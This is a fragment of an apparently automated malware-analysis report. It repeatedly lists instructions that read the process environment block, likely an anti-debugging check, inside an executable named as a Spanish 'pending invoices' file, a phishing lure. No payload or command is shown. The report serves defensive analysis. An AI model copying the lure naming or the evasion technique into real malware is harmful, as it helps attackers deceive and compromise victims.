      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250B2C0 mov eax, dword ptr fs:[00000030h]3_2_3250B2C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250B2C0 mov eax, dword ptr fs:[00000030h]3_2_3250B2C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250B2C0 mov eax, dword ptr fs:[00000030h]3_2_3250B2C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250B2C0 mov eax, dword ptr fs:[00000030h]3_2_3250B2C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250B2C0 mov eax, dword ptr fs:[00000030h]3_2_3250B2C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250B2C0 mov eax, dword ptr fs:[00000030h]3_2_3250B2C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250B2C0 mov eax, dword ptr fs:[00000030h]3_2_3250B2C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DB2D3 mov eax, dword ptr fs:[00000030h]3_2_324DB2D3
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DB2D3 mov eax, dword ptr fs:[00000030h]3_2_324DB2D3
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DB2D3 mov eax, dword ptr fs:[00000030h]3_2_324DB2D3
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259F2F8 mov eax, dword ptr fs:[00000030h]3_2_3259F2F8
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258B2F0 mov eax, dword ptr fs:[00000030h]3_2_3258B2F0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258B2F0 mov eax, dword ptr fs:[00000030h]3_2_3258B2F0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D92FF mov eax, dword ptr fs:[00000030h]3_2_324D92FF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325912ED mov eax, dword ptr fs:[00000030h]3_2_325912ED
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325912ED mov eax, dword ptr fs:[00000030h]3_2_325912ED
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325912ED mov eax, dword ptr fs:[00000030h]3_2_325912ED
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325912ED mov eax, dword ptr fs:[00000030h]3_2_325912ED
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325912ED mov eax, dword ptr fs:[00000030h]3_2_325912ED
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325912ED mov eax, dword ptr fs:[00000030h]3_2_325912ED
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325912ED mov eax, dword ptr fs:[00000030h]3_2_325912ED
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325912ED mov eax, dword ptr fs:[00000030h]3_2_325912ED
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325912ED mov eax, dword ptr fs:[00000030h]3_2_325912ED
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325912ED mov eax, dword ptr fs:[00000030h]3_2_325912ED
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325912ED mov eax, dword ptr fs:[00000030h]3_2_325912ED
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325912ED mov eax, dword ptr fs:[00000030h]3_2_325912ED
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325912ED mov eax, dword ptr fs:[00000030h]3_2_325912ED
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325912ED mov eax, dword ptr fs:[00000030h]3_2_325912ED
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B52E2 mov eax, dword ptr fs:[00000030h]3_2_325B52E2
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3251329E mov eax, dword ptr fs:[00000030h]3_2_3251329E
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3251329E mov eax, dword ptr fs:[00000030h]3_2_3251329E
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B5283 mov eax, dword ptr fs:[00000030h]3_2_325B5283
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325692BC mov eax, dword ptr fs:[00000030h]3_2_325692BC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325692BC mov eax, dword ptr fs:[00000030h]3_2_325692BC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325692BC mov ecx, dword ptr fs:[00000030h]3_2_325692BC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325692BC mov ecx, dword ptr fs:[00000030h]3_2_325692BC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F52A0 mov eax, dword ptr fs:[00000030h]3_2_324F52A0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F52A0 mov eax, dword ptr fs:[00000030h]3_2_324F52A0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F52A0 mov eax, dword ptr fs:[00000030h]3_2_324F52A0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F52A0 mov eax, dword ptr fs:[00000030h]3_2_324F52A0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325772A0 mov eax, dword ptr fs:[00000030h]3_2_325772A0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325772A0 mov eax, dword ptr fs:[00000030h]3_2_325772A0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A92A6 mov eax, dword ptr fs:[00000030h]3_2_325A92A6
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A92A6 mov eax, dword ptr fs:[00000030h]3_2_325A92A6
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A92A6 mov eax, dword ptr fs:[00000030h]3_2_325A92A6
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A92A6 mov eax, dword ptr fs:[00000030h]3_2_325A92A6
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DD34C mov eax, dword ptr fs:[00000030h]3_2_324DD34C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DD34C mov eax, dword ptr fs:[00000030h]3_2_324DD34C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B5341 mov eax, dword ptr fs:[00000030h]3_2_325B5341
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D9353 mov eax, dword ptr fs:[00000030h]3_2_324D9353
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D9353 mov eax, dword ptr fs:[00000030h]3_2_324D9353
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32583370 mov eax, dword ptr fs:[00000030h]3_2_32583370
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259F367 mov eax, dword ptr fs:[00000030h]3_2_3259F367
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E7370 mov eax, dword ptr fs:[00000030h]3_2_324E7370
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E7370 mov eax, dword ptr fs:[00000030h]3_2_324E7370
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E7370 mov eax, dword ptr fs:[00000030h]3_2_324E7370
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256930B mov eax, dword ptr fs:[00000030h]3_2_3256930B
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256930B mov eax, dword ptr fs:[00000030h]3_2_3256930B
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256930B mov eax, dword ptr fs:[00000030h]3_2_3256930B
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A132D mov eax, dword ptr fs:[00000030h]3_2_325A132D
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A132D mov eax, dword ptr fs:[00000030h]3_2_325A132D
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250F32A mov eax, dword ptr fs:[00000030h]3_2_3250F32A
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D7330 mov eax, dword ptr fs:[00000030h]3_2_324D7330
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259B3D0 mov ecx, dword ptr fs:[00000030h]3_2_3259B3D0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B53FC mov eax, dword ptr fs:[00000030h]3_2_325B53FC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259F3E6 mov eax, dword ptr fs:[00000030h]3_2_3259F3E6
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B539D mov eax, dword ptr fs:[00000030h]3_2_325B539D
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3253739A mov eax, dword ptr fs:[00000030h]3_2_3253739A
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3253739A mov eax, dword ptr fs:[00000030h]3_2_3253739A
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325813B9 mov eax, dword ptr fs:[00000030h]3_2_325813B9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325813B9 mov eax, dword ptr fs:[00000030h]3_2_325813B9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325813B9 mov eax, dword ptr fs:[00000030h]3_2_325813B9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325133A0 mov eax, dword ptr fs:[00000030h]3_2_325133A0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325133A0 mov eax, dword ptr fs:[00000030h]3_2_325133A0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325033A5 mov eax, dword ptr fs:[00000030h]3_2_325033A5
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250B052 mov eax, dword ptr fs:[00000030h]3_2_3250B052
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258705E mov ebx, dword ptr fs:[00000030h]3_2_3258705E
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258705E mov eax, dword ptr fs:[00000030h]3_2_3258705E
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3255D070 mov ecx, dword ptr fs:[00000030h]3_2_3255D070
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256106E mov eax, dword ptr fs:[00000030h]3_2_3256106E
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B5060 mov eax, dword ptr fs:[00000030h]3_2_325B5060
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1070 mov eax, dword ptr fs:[00000030h]3_2_324F1070
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1070 mov ecx, dword ptr fs:[00000030h]3_2_324F1070
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1070 mov eax, dword ptr fs:[00000030h]3_2_324F1070
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1070 mov eax, dword ptr fs:[00000030h]3_2_324F1070
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1070 mov eax, dword ptr fs:[00000030h]3_2_324F1070
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1070 mov eax, dword ptr fs:[00000030h]3_2_324F1070
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1070 mov eax, dword ptr fs:[00000030h]3_2_324F1070
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1070 mov eax, dword ptr fs:[00000030h]3_2_324F1070
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1070 mov eax, dword ptr fs:[00000030h]3_2_324F1070
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1070 mov eax, dword ptr fs:[00000030h]3_2_324F1070
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1070 mov eax, dword ptr fs:[00000030h]3_2_324F1070
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1070 mov eax, dword ptr fs:[00000030h]3_2_324F1070
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1070 mov eax, dword ptr fs:[00000030h]3_2_324F1070
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A903E mov eax, dword ptr fs:[00000030h]3_2_325A903E
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A903E mov eax, dword ptr fs:[00000030h]3_2_325A903E
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A903E mov eax, dword ptr fs:[00000030h]3_2_325A903E
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A903E mov eax, dword ptr fs:[00000030h]3_2_325A903E
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B50D9 mov eax, dword ptr fs:[00000030h]3_2_325B50D9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325090DB mov eax, dword ptr fs:[00000030h]3_2_325090DB
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov ecx, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov ecx, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov ecx, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov ecx, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3255D0C0 mov eax, dword ptr fs:[00000030h]3_2_3255D0C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3255D0C0 mov eax, dword ptr fs:[00000030h]3_2_3255D0C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325050E4 mov eax, dword ptr fs:[00000030h]3_2_325050E4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325050E4 mov ecx, dword ptr fs:[00000030h]3_2_325050E4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DD08D mov eax, dword ptr fs:[00000030h]3_2_324DD08D
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250D090 mov eax, dword ptr fs:[00000030h]3_2_3250D090
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250D090 mov eax, dword ptr fs:[00000030h]3_2_3250D090
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3251909C mov eax, dword ptr fs:[00000030h]3_2_3251909C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256D080 mov eax, dword ptr fs:[00000030h]3_2_3256D080
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256D080 mov eax, dword ptr fs:[00000030h]3_2_3256D080
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E5096 mov eax, dword ptr fs:[00000030h]3_2_324E5096
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D9148 mov eax, dword ptr fs:[00000030h]3_2_324D9148
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D9148 mov eax, dword ptr fs:[00000030h]3_2_324D9148
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D9148 mov eax, dword ptr fs:[00000030h]3_2_324D9148
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D9148 mov eax, dword ptr fs:[00000030h]3_2_324D9148
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B5152 mov eax, dword ptr fs:[00000030h]3_2_325B5152
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32573140 mov eax, dword ptr fs:[00000030h]3_2_32573140
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32573140 mov eax, dword ptr fs:[00000030h]3_2_32573140
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32573140 mov eax, dword ptr fs:[00000030h]3_2_32573140
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E7152 mov eax, dword ptr fs:[00000030h]3_2_324E7152
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32579179 mov eax, dword ptr fs:[00000030h]3_2_32579179
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DB136 mov eax, dword ptr fs:[00000030h]3_2_324DB136
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DB136 mov eax, dword ptr fs:[00000030h]3_2_324DB136
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DB136 mov eax, dword ptr fs:[00000030h]3_2_324DB136
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DB136 mov eax, dword ptr fs:[00000030h]3_2_324DB136
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B7120 mov eax, dword ptr fs:[00000030h]3_2_325B7120
